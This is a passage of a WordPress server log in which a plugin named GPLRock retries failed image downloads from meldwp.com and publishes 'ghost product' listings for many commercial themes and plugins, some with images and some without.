WITHOUT image - Product ID: palette-photographer-portfolio-wordpress [05-Apr-2026 09:09:29 UTC] GPLRock: Image download failed for product osnic-adsense-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:31 UTC] GPLRock: Image download failed for product osnic-adsense-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osnic---adsense-wordpress-theme-22269.webp for product osnic-adsense-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:33 UTC] GPLRock: Image download failed for product osnic-adsense-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:35 UTC] GPLRock: Image download failed for product osnic-adsense-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osnic---adsense-wordpress-theme-22269.webp for product osnic-adsense-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:37 UTC] GPLRock WARNING: Image download failed for product osnic-adsense-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/osnic---adsense-wordpress-theme-22269.webp [05-Apr-2026 09:09:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: osnic-adsense-wordpress-theme [05-Apr-2026 09:09:38 UTC] GPLRock: Image download failed for product amymovie-film-and-cinema-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:40 UTC] GPLRock: Image download failed for product amymovie-film-and-cinema-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amymovie---film-and-cinema-wordpress-theme-7260.webp for product amymovie-film-and-cinema-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:42 UTC] GPLRock: Image download failed for product amymovie-film-and-cinema-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:44 UTC] GPLRock: Image download failed for product amymovie-film-and-cinema-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amymovie---film-and-cinema-wordpress-theme-7260.webp for product amymovie-film-and-cinema-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:46 UTC] GPLRock WARNING: Image download failed for product amymovie-film-and-cinema-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/amymovie---film-and-cinema-wordpress-theme-7260.webp [05-Apr-2026 09:09:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amymovie-film-and-cinema-wordpress-theme [05-Apr-2026 09:09:46 UTC] GPLRock: Image download failed for product tadrees-school-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:48 UTC] GPLRock: Image download failed for product tadrees-school-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tadrees---school-education-wordpress-theme-5574.webp for product tadrees-school-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:51 UTC] GPLRock: Image download failed for product tadrees-school-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:53 UTC] GPLRock: Image download failed for product tadrees-school-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tadrees---school-education-wordpress-theme-5574.webp for product tadrees-school-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:55 UTC] GPLRock WARNING: Image download failed for product tadrees-school-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tadrees---school-education-wordpress-theme-5574.webp [05-Apr-2026 09:09:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tadrees-school-education-wordpress-theme [05-Apr-2026 09:09:55 UTC] GPLRock: Image download failed for product food-stuff-wp-multipurpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:57 UTC] GPLRock: Image download failed for product food-stuff-wp-multipurpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/food-stuff-wp---multipurpose-elementor-woocommerce-theme-32651.webp for product food-stuff-wp-multipurpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:59 UTC] GPLRock: Image download failed for product food-stuff-wp-multipurpose-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:10:01 UTC] GPLRock: Image download failed for product food-stuff-wp-multipurpose-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:10:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/food-stuff-wp---multipurpose-elementor-woocommerce-theme-32651.webp for product food-stuff-wp-multipurpose-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:10:03 UTC] GPLRock WARNING: Image download failed for product food-stuff-wp-multipurpose-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/food-stuff-wp---multipurpose-elementor-woocommerce-theme-32651.webp [05-Apr-2026 09:10:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: food-stuff-wp-multipurpose-elementor-woocommerce-theme [05-Apr-2026 09:10:20 UTC] GPLRock: Image downloaded successfully for product tickera-wordpress-event-ticketing-system (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9f12589.jpg [05-Apr-2026 09:10:20 UTC] GPLRock: Using pre-downloaded image for product tickera-wordpress-event-ticketing-system: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9f12589.jpg [05-Apr-2026 09:10:20 UTC] GPLRock: Ghost product published with image - Product ID: tickera-wordpress-event-ticketing-system [05-Apr-2026 09:10:21 UTC] GPLRock: Image downloaded successfully for product woocommerce-automatic-order-printing (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa7bec7b.jpg [05-Apr-2026 09:10:21 UTC] GPLRock: Using pre-downloaded image for product woocommerce-automatic-order-printing: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa7bec7b.jpg [05-Apr-2026 09:10:21 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-automatic-order-printing [05-Apr-2026 09:10:23 UTC] GPLRock: Image downloaded successfully for product storeapps-smart-manager-manage-your-woocommerce-store-10x (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18fa71ca.jpg [05-Apr-2026 09:10:24 UTC] GPLRock: Using pre-downloaded image for product storeapps-smart-manager-manage-your-woocommerce-store-10x: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18fa71ca.jpg [05-Apr-2026 09:10:24 UTC] GPLRock: Ghost product published with image - Product ID: storeapps-smart-manager-manage-your-woocommerce-store-10x [05-Apr-2026 09:10:25 UTC] GPLRock: Image downloaded successfully for product acf-extended-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a4425a70.jpg [05-Apr-2026 09:10:25 UTC] GPLRock: Using pre-downloaded image for product acf-extended-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a4425a70.jpg [05-Apr-2026 09:10:25 UTC] GPLRock: Ghost product published with image - Product ID: acf-extended-pro [05-Apr-2026 09:10:27 UTC] GPLRock: Image downloaded successfully for product kalisa-blog-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-780cac40.jpg [05-Apr-2026 09:10:27 UTC] GPLRock: Using pre-downloaded image for product kalisa-blog-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-780cac40.jpg [05-Apr-2026 09:10:27 UTC] GPLRock: Ghost product published with image - Product ID: kalisa-blog-magazine-wordpress-theme [05-Apr-2026 09:10:29 UTC] GPLRock: Image downloaded successfully for product divi-madmenu-advanced-divi-menu-module (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-679746fd.jpg [05-Apr-2026 09:10:29 UTC] GPLRock: Using pre-downloaded image for product divi-madmenu-advanced-divi-menu-module: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-679746fd.jpg [05-Apr-2026 09:10:29 UTC] GPLRock: Ghost product published with image - Product ID: divi-madmenu-advanced-divi-menu-module [05-Apr-2026 09:10:30 UTC] GPLRock: Image downloaded successfully for product termico-spa-and-beauty-salon-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3743514.jpg [05-Apr-2026 09:10:30 UTC] GPLRock: Using pre-downloaded image for product termico-spa-and-beauty-salon-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3743514.jpg [05-Apr-2026 09:10:30 UTC] GPLRock: Ghost product published with image - Product ID: termico-spa-and-beauty-salon-wordpress-theme [05-Apr-2026 09:10:32 UTC] GPLRock: Image downloaded successfully for product coin-market-cap-prices-wordpress-cryptocurrency-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-916513d9.jpg [05-Apr-2026 09:10:32 UTC] GPLRock: Using pre-downloaded image for product coin-market-cap-prices-wordpress-cryptocurrency-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-916513d9.jpg [05-Apr-2026 09:10:32 UTC] GPLRock: Ghost product published with image - Product ID: coin-market-cap-prices-wordpress-cryptocurrency-plugin [05-Apr-2026 09:10:33 UTC] GPLRock: Image downloaded successfully for product barn2-media-woocommerce-product-options (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3aeaf7cf.jpg [05-Apr-2026 09:10:34 UTC] GPLRock: Using pre-downloaded image for product barn2-media-woocommerce-product-options: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3aeaf7cf.jpg [05-Apr-2026 09:10:34 UTC] GPLRock: Ghost product published with image - Product ID: barn2-media-woocommerce-product-options [05-Apr-2026 09:20:22 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-automessage (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29a94b9f.jpg [05-Apr-2026 09:20:22 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-automessage: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29a94b9f.jpg [05-Apr-2026 09:20:22 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-automessage [05-Apr-2026 09:20:24 UTC] GPLRock: Image downloaded successfully for product wpdiscuz-wordpress-comment-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-437ce6b3.jpg [05-Apr-2026 09:20:24 UTC] GPLRock: Using pre-downloaded image for product wpdiscuz-wordpress-comment-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-437ce6b3.jpg [05-Apr-2026 09:20:24 UTC] GPLRock: Ghost product published with image - Product ID: wpdiscuz-wordpress-comment-plugin [05-Apr-2026 09:20:25 UTC] GPLRock: Image downloaded successfully for product woocommerce-photography (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bd7fe08a.jpg [05-Apr-2026 09:20:25 UTC] GPLRock: Using pre-downloaded image for product woocommerce-photography: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bd7fe08a.jpg [05-Apr-2026 09:20:25 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-photography [05-Apr-2026 09:20:27 UTC] GPLRock: Image downloaded successfully for product gravity-forms-postmark-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fae25a9d.jpg [05-Apr-2026 09:20:28 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-postmark-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fae25a9d.jpg [05-Apr-2026 09:20:28 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-postmark-addon [05-Apr-2026 09:20:29 UTC] GPLRock: Image downloaded successfully for product envira-gallery-deeplinking-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-841c6a8d.jpg [05-Apr-2026 09:20:29 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-deeplinking-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-841c6a8d.jpg [05-Apr-2026 09:20:29 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-deeplinking-addon [05-Apr-2026 09:20:31 UTC] GPLRock: Image downloaded successfully for product woocommerce-hide-products-by-user-roles (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd00069c.jpg [05-Apr-2026 09:20:31 UTC] GPLRock: Using pre-downloaded image for product woocommerce-hide-products-by-user-roles: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd00069c.jpg [05-Apr-2026 09:20:31 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-hide-products-by-user-roles [05-Apr-2026 09:20:33 UTC] GPLRock: Image downloaded successfully for product sleek-responsive-creative-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d80f6e11.jpg [05-Apr-2026 09:20:33 UTC] GPLRock: Using pre-downloaded image for product sleek-responsive-creative-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d80f6e11.jpg [05-Apr-2026 09:20:33 UTC] GPLRock: Ghost product published with image - Product ID: sleek-responsive-creative-wordpress-blog-theme [05-Apr-2026 09:20:35 UTC] GPLRock: Image downloaded successfully for product yith-panarea-restaurant-and-food-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-65010e52.jpg [05-Apr-2026 09:20:35 UTC] GPLRock: Using pre-downloaded image for product yith-panarea-restaurant-and-food-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-65010e52.jpg [05-Apr-2026 09:20:35 UTC] GPLRock: Ghost product published with image - Product ID: yith-panarea-restaurant-and-food-wordpress-theme [05-Apr-2026 09:20:36 UTC] GPLRock: Image downloaded successfully for product elmastudio-nilmini-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e3c805da.jpg [05-Apr-2026 09:20:36 UTC] GPLRock: Using pre-downloaded image for product elmastudio-nilmini-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e3c805da.jpg [05-Apr-2026 09:20:36 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-nilmini-wordpress-theme [05-Apr-2026 09:20:38 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-mailpoet (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e9c9034.jpg [05-Apr-2026 09:20:38 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-mailpoet: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e9c9034.jpg [05-Apr-2026 09:20:38 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-mailpoet [05-Apr-2026 09:22:08 UTC] GPLRock: Image download failed for product woocommerce-bulk-variations (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:22:10 UTC] GPLRock: Image download failed for product woocommerce-bulk-variations (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:22:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-bulk-variations-21415.webp for product woocommerce-bulk-variations after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:22:12 UTC] GPLRock: Image download failed for product woocommerce-bulk-variations (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:22:14 UTC] GPLRock: Image download failed for product woocommerce-bulk-variations (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:22:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-bulk-variations-21415.webp for product woocommerce-bulk-variations after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:22:16 UTC] GPLRock WARNING: Image download failed for product woocommerce-bulk-variations. URL: https://meldwp.com/wp-content/uploads/woocommerce-bulk-variations-21415.webp [05-Apr-2026 09:22:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-bulk-variations [05-Apr-2026 09:22:16 UTC] GPLRock: Image download failed for product wp-featured-news-pro-custom-posts-listing-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:22:19 UTC] GPLRock: Image download failed for product wp-featured-news-pro-custom-posts-listing-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:22:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-featured-news-pro--custom-posts-listing-plugin-33697.webp for product wp-featured-news-pro-custom-posts-listing-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:22:21 UTC] GPLRock: Image download failed for product wp-featured-news-pro-custom-posts-listing-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:22:23 UTC] GPLRock: Image download failed for product wp-featured-news-pro-custom-posts-listing-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:32:22 UTC] GPLRock: Image downloaded successfully for product tyrest-car-tire-wheel-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cae66eb.jpg [05-Apr-2026 09:32:22 UTC] GPLRock: Using pre-downloaded image for product tyrest-car-tire-wheel-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cae66eb.jpg [05-Apr-2026 09:32:22 UTC] GPLRock: Ghost product published with image - Product ID: tyrest-car-tire-wheel-service-elementor-template-kit [05-Apr-2026 09:32:23 UTC] GPLRock: Image downloaded successfully for product trotol-renovation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed0240f8.webp [05-Apr-2026 09:32:23 UTC] GPLRock: Using pre-downloaded image for product trotol-renovation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed0240f8.webp [05-Apr-2026 09:32:23 UTC] GPLRock: Ghost product published with image - Product ID: trotol-renovation-elementor-template-kit [05-Apr-2026 09:32:25 UTC] GPLRock: Image downloaded successfully for product troof-roofing-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2d75f7d.jpg [05-Apr-2026 09:32:25 UTC] GPLRock: Using pre-downloaded image for product troof-roofing-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c2d75f7d.jpg [05-Apr-2026 09:32:25 UTC] GPLRock: Ghost product published with image - Product ID: troof-roofing-service-elementor-template-kit [05-Apr-2026 09:32:26 UTC] GPLRock: Image downloaded successfully for product trical-bike-scooter-rental-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-043661be.webp [05-Apr-2026 09:32:27 UTC] GPLRock: Using pre-downloaded image for product trical-bike-scooter-rental-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-043661be.webp [05-Apr-2026 09:32:27 UTC] GPLRock: Ghost product published with image - Product ID: trical-bike-scooter-rental-elementor-template-kit [05-Apr-2026 09:32:28 UTC] GPLRock: Image downloaded successfully for product tow-now-towing-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4938f765.webp [05-Apr-2026 09:32:28 UTC] GPLRock: Using pre-downloaded image for product tow-now-towing-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4938f765.webp [05-Apr-2026 09:32:28 UTC] GPLRock: Ghost product published with image - Product ID: tow-now-towing-services-elementor-template-kit [05-Apr-2026 09:32:29 UTC] GPLRock: Image downloaded successfully for product torial-interior-design-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6cd01960.webp [05-Apr-2026 09:32:30 UTC] GPLRock: Using pre-downloaded image for product torial-interior-design-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6cd01960.webp [05-Apr-2026 09:32:30 UTC] GPLRock: Ghost product published with image - Product ID: torial-interior-design-elementor-template-kit [05-Apr-2026 09:32:31 UTC] GPLRock: Image downloaded successfully for product topspin-tennis-school-sports-club-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-015ebbe0.jpg [05-Apr-2026 09:32:32 UTC] GPLRock: Using pre-downloaded image for product topspin-tennis-school-sports-club-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-015ebbe0.jpg [05-Apr-2026 09:32:32 UTC] GPLRock: Ghost product published with image - Product ID: topspin-tennis-school-sports-club-elementor-template-kit [05-Apr-2026 09:32:33 UTC] GPLRock: Image downloaded successfully for product topika-insurance-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cabd15d9.webp [05-Apr-2026 09:32:33 UTC] GPLRock: Using pre-downloaded image for product topika-insurance-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cabd15d9.webp [05-Apr-2026 09:32:33 UTC] GPLRock: Ghost product published with image - Product ID: topika-insurance-agency-elementor-template-kit [05-Apr-2026 09:32:35 UTC] GPLRock: Image downloaded successfully for product topchess-chess-club-courses-training-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-87d04806.jpg [05-Apr-2026 09:32:35 UTC] GPLRock: Using pre-downloaded image for product topchess-chess-club-courses-training-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-87d04806.jpg [05-Apr-2026 09:32:35 UTC] GPLRock: Ghost product published with image - Product ID: topchess-chess-club-courses-training-elementor-template-kit [05-Apr-2026 09:32:36 UTC] GPLRock: Image downloaded successfully for product tomahawk-online-courses-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b010e8b4.webp [05-Apr-2026 09:32:36 UTC] GPLRock: Using pre-downloaded image for product tomahawk-online-courses-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b010e8b4.webp [05-Apr-2026 09:32:36 UTC] GPLRock: Ghost product published with image - Product ID: tomahawk-online-courses-elementor-template-kit [05-Apr-2026 09:33:27 UTC] GPLRock: Image downloaded successfully for product umeno-multipurpose-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7fddc1f2.webp [05-Apr-2026 09:33:27 UTC] GPLRock: Using pre-downloaded image for product umeno-multipurpose-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7fddc1f2.webp [05-Apr-2026 09:33:27 UTC] GPLRock: Ghost product published with image - Product ID: umeno-multipurpose-woocommerce-theme [05-Apr-2026 09:33:27 UTC] GPLRock: Image download failed for product snowy-ski-snowboarding-resort-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:29 UTC] GPLRock: Image download failed for product snowy-ski-snowboarding-resort-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/snowy---ski--snowboarding-resort-wordpress-theme-24079.webp for product snowy-ski-snowboarding-resort-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:33:32 UTC] GPLRock: Image download failed for product snowy-ski-snowboarding-resort-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:34 UTC] GPLRock: Image download failed for product snowy-ski-snowboarding-resort-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/snowy---ski--snowboarding-resort-wordpress-theme-24079.webp for product snowy-ski-snowboarding-resort-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:33:36 UTC] GPLRock WARNING: Image download failed for product snowy-ski-snowboarding-resort-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/snowy---ski--snowboarding-resort-wordpress-theme-24079.webp [05-Apr-2026 09:33:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: snowy-ski-snowboarding-resort-wordpress-theme [05-Apr-2026 09:33:36 UTC] GPLRock: Image download failed for product vg-ifoody-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:38 UTC] GPLRock: Image download failed for product vg-ifoody-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-ifoody---responsive-woocommerce-wordpress-theme-7576.webp for product vg-ifoody-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:33:40 UTC] GPLRock: Image download failed for product vg-ifoody-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:42 UTC] GPLRock: Image download failed for product vg-ifoody-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-ifoody---responsive-woocommerce-wordpress-theme-7576.webp for product vg-ifoody-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:33:45 UTC] GPLRock WARNING: Image download failed for product vg-ifoody-responsive-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vg-ifoody---responsive-woocommerce-wordpress-theme-7576.webp [05-Apr-2026 09:33:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vg-ifoody-responsive-woocommerce-wordpress-theme [05-Apr-2026 09:33:45 UTC] GPLRock: Image download failed for product rehub-price-comparison-multi-vendor-marketplace-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:47 UTC] GPLRock: Image download failed for product rehub-price-comparison-multi-vendor-marketplace-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rehub---price-comparison-multi-vendor-marketplace-wordpress-theme-1276.webp for product rehub-price-comparison-multi-vendor-marketplace-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:33:49 UTC] GPLRock: Image download failed for product rehub-price-comparison-multi-vendor-marketplace-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:51 UTC] GPLRock: Image download failed for product rehub-price-comparison-multi-vendor-marketplace-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rehub---price-comparison-multi-vendor-marketplace-wordpress-theme-1276.webp for product rehub-price-comparison-multi-vendor-marketplace-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:33:53 UTC] GPLRock WARNING: Image download failed for product rehub-price-comparison-multi-vendor-marketplace-wordpress-theme. URL: 